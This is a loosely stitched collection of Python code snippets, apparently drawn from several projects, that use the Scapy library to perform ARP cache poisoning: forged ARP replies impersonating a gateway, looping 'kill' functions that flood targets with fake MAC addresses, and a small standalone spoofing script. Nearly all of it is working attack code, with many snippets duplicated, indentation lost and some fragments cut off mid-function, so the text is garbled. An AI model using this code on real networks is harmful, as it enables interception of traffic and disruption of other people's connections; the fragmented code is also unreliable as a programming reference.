def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='who-has', hwsrc=self.mac, psrc=ip, pdst=ip, hwdst=self.rmac)
oldmac = self.whohas(ip)
oldip = ip
while True:
try:
ip = q.get_nowait()
if oldmac is not None:
debug('Healing victim %s/%s' % (oldip, oldmac))
pa.psrc = oldip
pa.hwsrc = oldmac
sendp(pe/pa, verbose=0)
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
pa.hwsrc = self.mac
oldip = ip
oldmac = self.whohas(ip)
except Empty:
# Send the poison... all your base are belong to us!
sendp(pe/pa, verbose=0)
sleep(1/self.poison_rate)
def PoisonARPCache(): # Constructing packet for Victim A frameA = Ether() frameA.src = ATTACKER_MAC frameA.dst = VICTIM_A_MAC arpA = ARP() arpA.hwsrc = ATTACKER_MAC arpA.psrc = VICTIM_B_IP arpA.pdst = VICTIM_A_IP arpA.op = 1 # Constructing packet for Victim B frameB = Ether() frameB.src = ATTACKER_MAC frameB.dst = VICTIM_B_MAC arpB = ARP() arpB.hwsrc = ATTACKER_MAC arpB.psrc = VICTIM_A_IP arpB.pdst = VICTIM_B_IP arpB.op = 1 packetA = frameA/arpA packetB = frameB/arpB while True: sendp(packetA) sendp(packetB) sleep(5)
def restore_arp_table(dst, src):
arp_response = ARP()
arp_response.op = 2 # now it is a response
arp_response.pdst = dst
arp_response.hwdst = get_mac(dst)
arp_response.hwsrc = get_mac(src)
arp_response.psrc = src # 192.168.0.36
send(arp_response, count=10, verbose=False)
def arp_spoof(ip_to_spoof, pretend_ip):
arp_response = ARP()
arp_response.op = 2 # now it is a response
arp_response.pdst = ip_to_spoof
arp_response.hwdst = get_mac(ip_to_spoof)
arp_response.hwsrc = "00:0c:29:9d:e8:09"
arp_response.psrc = pretend_ip # 192.168.0.36
send(arp_response, verbose=False)
def __init__(self, ip, mac):
ether = Ether()
ether.src = mac # Default: network card mac
arp = ARP()
arp.op = arp.is_at
arp.psrc = ip
arp.hwsrc = mac
self.arp = arp
self.ether = ether
def __init__(self, ip, mac):
ether = Ether()
ether.src = mac # Default: network card mac
arp = ARP()
arp.op = arp.is_at
arp.psrc = ip
arp.hwsrc = mac
self.arp = arp
self.ether = ether
def spoof(from_ip, to_ip, spoofed_mac, hwdest=None):
if not hwdest:
## Broadcast if the mac address can't be retrieved
hwdest = getMacAddress(to_ip) or "ff:ff:ff:ff:ff:ff"
packet = ARP()
packet.hwdest = hwdest
packet.pdst = to_ip
packet.hwsrc = spoofed_mac
packet.psrc = from_ip
send(packet, verbose=0)
return hwdest
def create_arp_packet(target, victim):
a = ARP()
# target whose arp cache is to be poisoned
a.pdst = target
# attacker's MAC Address of assuming eth0
# get it from the system information
a.hwsrc = getHwAddr('eth0')
# victim's ip
a.psrc = victim
a.hwdst = "ff:ff:ff:ff:ff:ff"
return a
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
if targets is not list:
targets = [targets]
a = ARP()
a.psrc = gateway_ip
a.hwsrc = "2b:2b:2b:2b:2b:2b"
a.hwdst = "ff:ff:ff:ff:ff:ff"
while True:
for target in targets:
a.pdst = target
send(a)
if not nloop:
break
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
if targets is not list:
targets = [targets]
a = ARP()
a.psrc = gateway_ip
a.hwsrc = "2b:2b:2b:2b:2b:2b"
a.hwdst = "ff:ff:ff:ff:ff:ff"
while True:
for target in targets:
a.pdst = target
send(a)
if not nloop:
break
def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='who-has',
hwsrc=self.mac,
psrc=ip,
pdst=ip,
hwdst=self.rmac)
oldmac = self.whohas(ip)
oldip = ip
while True:
try:
ip = q.get_nowait()
if oldmac is not None:
debug('Healing victim %s/%s' % (oldip, oldmac))
pa.psrc = oldip
pa.hwsrc = oldmac
sendp(pe / pa, verbose=0)
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
pa.hwsrc = self.mac
oldip = ip
oldmac = self.whohas(ip)
except Empty:
# Send the poison... all your base are belong to us!
debug('Poisoning %s...' % ip)
sendp(pe / pa, verbose=0)
sleep(1 / self.poison_rate)
def arp_attack():
arpFake = ARP()
psrc = get_gate_way()
pdst = get_broadcast()
hwsrc = get_mac_address()
arpFake.psrc = psrc
arpFake.pdst = pdst
arpFake.hwsrc = hwsrc
arpFake.op = 2
while 1:
send(arpFake)
print 'arp send'
def arp_attack():
apr_spoof = ARP()
psrc = get_gate_way()
pdst = get_broadcast()
hwsrc = get_mac_address()
apr_spoof.psrc = psrc
apr_spoof.pdst = pdst
apr_spoof.hwsrc = hwsrc
apr_spoof.op = 2
while 1:
send(apr_spoof)
print 'arp sent'
def arpspoof_via_scapy(impersonated_host, victim_ip):
from scapy.all import ARP, IP, send, srp, sr1, conf
# Note that we're using scapy, so the ARP spoof shutdown code knows it needs to send
# corrective ARP replies.
ml.arpspoof_via_scapy = 1
pid = os.fork()
if pid:
ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % pid)
# Let's add this process to a list of child processes that we will need to
# explicitly shut down.
ml.child_pids_to_shutdown.append(pid)
else:
# Turn off scapy's verbosity?
conf.verb = 0
# Build an ARP response to set up spoofing
arp_response = ARP()
# define a constant for ARP responses
const_ARP_RESPONSE = 2
# Set the type to a ARP response
arp_response.op = const_ARP_RESPONSE
# Hardware address we want to claim the packet
arp_response.hwsrc = ml.my_mac
# IP address we want to map to that address
arp_response.psrc = impersonated_host
# Now set the ARP response target
non_broadcast = 0
if non_broadcast:
# MAC address and IP address of our victim
arp_response.hwdst = lookup_mac_via_scapy(victim_ip)
arp_response.pdst = victim_ip
else:
arp_response.hwdst = "ff:ff:ff:ff:ff:ff"
arp_response.pdst = ml.my_broadcast
# Issue the ARP response every 5 seconds
while (1):
send(arp_response)
sleep(3)
print "Arpspoofing dying"
exit
def arpspoof_via_scapy(impersonated_host, victim_ip):
from scapy.all import ARP,IP,send,srp,sr1,conf
# Note that we're using scapy, so the ARP spoof shutdown code knows it needs to send
# corrective ARP replies.
ml.arpspoof_via_scapy = 1
pid = os.fork()
if pid:
ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % pid)
# Let's add this process to a list of child processes that we will need to
# explicitly shut down.
ml.child_pids_to_shutdown.append(pid)
else:
# Turn off scapy's verbosity?
conf.verb=0
# Build an ARP response to set up spoofing
arp_response = ARP()
# define a constant for ARP responses
const_ARP_RESPONSE = 2
# Set the type to a ARP response
arp_response.op = const_ARP_RESPONSE
# Hardware address we want to claim the packet
arp_response.hwsrc = ml.my_mac
# IP address we want to map to that address
arp_response.psrc = impersonated_host
# Now set the ARP response target
non_broadcast=0
if non_broadcast:
# MAC address and IP address of our victim
arp_response.hwdst = lookup_mac_via_scapy(victim_ip)
arp_response.pdst = victim_ip
else:
arp_response.hwdst = "ff:ff:ff:ff:ff:ff"
arp_response.pdst = ml.my_broadcast
# Issue the ARP response every 5 seconds
while(1):
send(arp_response)
sleep(3)
print "Arpspoofing dying"
exit
def sendPackets(gateway_ip, target_ip, this_mac_address, target_mac_address):
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = this_mac_address
arp = arp
arp.pdst = target_ip # (say IP address of target machine)
arp.hwdst = target_mac_address # target mac
ether = Ether()
ether.src = this_mac_address
ether.dst = target_mac_address
arp.op = 2
def broadcast():
packet = ether / arp
sendp(x=packet, verbose=True)
broadcast()
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
# Function for sending the malicious ARP packets out with the specified data
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
packet = ether / arp
sendp(x=packet, verbose=False)
exit(0)
poor_client_ip = sys.argv[1]
gateway_ip = sys.argv[2]
my_hardware = '11:11:11:11:11:11'
# Build arp packages
#
# attacker > poor_client
"""
arp_poor_client = ARP(op='who-has')
arp_poor_client.psrc = gateway_ip
arp_poor_client.hwsrc = my_hardware
arp_poor_client.pdst = poor_client_ip
arp_poor_client.hwdst = 'ff:ff:ff:ff:ff:ff'
"""
arp_poor_client = ARP(op='is-at')
arp_poor_client.psrc = '192.168.43.1'
arp_poor_client.hwsrc = my_hardware
arp_poor_client.pdst = poor_client_ip
arp_poor_client.hwdst = 'ff:ff:ff:ff:ff:ff'
while (1):
send(arp_poor_client)
sleep(1)
#!/usr/bin/python import sys from scapy.all import ARP,send a=ARP() a.hwsrc="aa:aa:aa:aa:aa:aa" #a.psrc="192.168.1.93" #a.hwdst="d4:be:d9:dc:4c:20" #a.pdst="192.168.1.12" #a.hwdst="00:00:00:00:00:00" #a.pdst="0.0.0.0" a.psrc="0.0.0.0" a.hwdst="ff:ff:ff:ff:ff:ff" a.pdst="255.255.255.255" send(a)
